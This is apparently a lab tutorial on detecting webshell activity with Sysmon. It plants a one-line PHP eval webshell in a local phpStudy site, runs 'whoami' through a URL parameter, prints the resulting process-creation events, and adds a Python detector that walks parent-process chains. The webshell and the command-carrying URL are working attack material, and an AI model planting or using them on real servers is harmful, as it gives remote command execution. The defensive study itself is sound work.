Sysmon data collection and detection of interactive commands executed through a webshell backdoor
Download phpStudy from https://public.xp.cn/upgrades/phpStudy_64.zip and start WNMP as shown in the figure below.
Webshell contents:
<?php echo "Your response is: " ;?>
<?php @eval($_GET['cmd']);?>
Write it to the file shell.php under C:\phpstudy_pro\WWW.
Run the command from the browser:
localhost/shell.php?cmd=system(%27whoami%27);
Note the trailing ; in the query.
The page then returns:
Now look at what Sysmon collected: there are 2 events.
One event records PHP's system() call starting the cmd process:
Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe /c "whoami"
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentProcessId: 3952
ParentImage: C:\phpstudy_pro\Extensions\php\php7.3.4nts\php-cgi.exe
ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe
ParentUser: DESKTOP-92JS9SJ\bonel
The other event is cmd starting whoami:
Process Create:
RuleName: -
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\Windows\System32\whoami.exe
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\phpstudy_pro\WWW\
User: DESKTOP-92JS9SJ\bonel
LogonGuid: {0bf95bee-6815-6267-e29f-050000000000}
LogonId: 0x59FE2
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentProcessId: 5512
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c "whoami"
ParentUser: DESKTOP-92JS9SJ\bonel
Therefore, the EDR detection should come down to checking the parent (and the parent's parent) process chain that launched whoami: here whoami.exe was started by cmd.exe, which in turn was started by php-cgi.exe.
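As an added example (not code from the original post), the following Python script implements that detection idea over Sysmon Event ID 1 text: it parses the events, links children to parents by ProcessGuid, and flags any process whose parent or grandparent is a web-server worker. The two sample events are constructed from the fields shown above (hashes and user fields omitted); the set of web-worker image names, the maximum walk depth and the function names are assumptions for this example.

```python
"""Flag processes spawned from a web-server worker using Sysmon Event ID 1 text.

Added example, not part of the original post. Sample events are constructed
from the two Process Create events shown in the post.
"""
import re
from typing import Dict, List

# Assumption: images that serve HTTP and should never have a shell beneath them.
WEB_WORKER_IMAGES = {"php-cgi.exe"}

# Constructed sample: key fields of the two events from the post.
SAMPLE_EVENTS = """\
Process Create:
UtcTime: 2022-04-26 08:20:16.986
ProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ProcessId: 5512
Image: C:\\Windows\\System32\\cmd.exe
CommandLine: cmd.exe /c "whoami"
CurrentDirectory: C:\\phpstudy_pro\\WWW\\
ParentProcessGuid: {0bf95bee-a686-6267-5407-000000000900}
ParentProcessId: 3952
ParentImage: C:\\phpstudy_pro\\Extensions\\php\\php7.3.4nts\\php-cgi.exe
ParentCommandLine: ../Extensions/php/php7.3.4nts/php-cgi.exe

Process Create:
UtcTime: 2022-04-26 08:20:17.010
ProcessGuid: {0bf95bee-ab41-6267-ac07-000000000900}
ProcessId: 4368
Image: C:\\Windows\\System32\\whoami.exe
CommandLine: whoami
CurrentDirectory: C:\\phpstudy_pro\\WWW\\
ParentProcessGuid: {0bf95bee-ab40-6267-aa07-000000000900}
ParentProcessId: 5512
ParentImage: C:\\Windows\\System32\\cmd.exe
ParentCommandLine: cmd.exe /c "whoami"
"""


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split Sysmon text into one dict per 'Process Create:' block.

    Each 'Key: value' line becomes a field; only the first colon separates
    key from value, so timestamps and Windows paths survive intact.
    """
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if not sep or key.strip() == "Process Create":
                continue
            fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX-style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestor_images(event: Dict[str, str], by_guid: Dict[str, Dict[str, str]],
                    max_depth: int = 8) -> List[str]:
    """Ancestor image names, nearest parent first.

    Walks ParentProcessGuid links through events we have seen; when the
    parent's own event was not captured, its ParentImage field still gives
    us one more level (the grandparent is then unknown, so the walk stops).
    """
    chain: List[str] = []
    cur = event
    for _ in range(max_depth):
        chain.append(basename(cur.get("ParentImage", "")))
        parent = by_guid.get(cur.get("ParentProcessGuid", ""))
        if parent is None:
            break
        cur = parent
    return chain


def find_web_spawned(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per process that has a web worker among its ancestors.

    'depth' is 1 for a direct child of the worker (cmd.exe here) and 2 for a
    grandchild (whoami.exe), matching the parent / parent-of-parent check.
    """
    by_guid = {e["ProcessGuid"]: e for e in events if "ProcessGuid" in e}
    findings = []
    for e in events:
        for depth, img in enumerate(ancestor_images(e, by_guid), start=1):
            if img in WEB_WORKER_IMAGES:
                findings.append({
                    "utc_time": e.get("UtcTime", ""),
                    "image": basename(e.get("Image", "")),
                    "command_line": e.get("CommandLine", ""),
                    "web_ancestor": img,
                    "depth": depth,
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_web_spawned(parse_events(SAMPLE_EVENTS)):
        print(f"{f['utc_time']} {f['image']} ({f['command_line']!r}) "
              f"spawned under {f['web_ancestor']} at depth {f['depth']}")
```

Walking the GUID chain rather than only matching ParentImage matters because the direct parent of whoami.exe is the perfectly ordinary cmd.exe; the suspicious link is one level up, so a rule that stops at the immediate parent sees the cmd.exe launch but not the command that ran inside it.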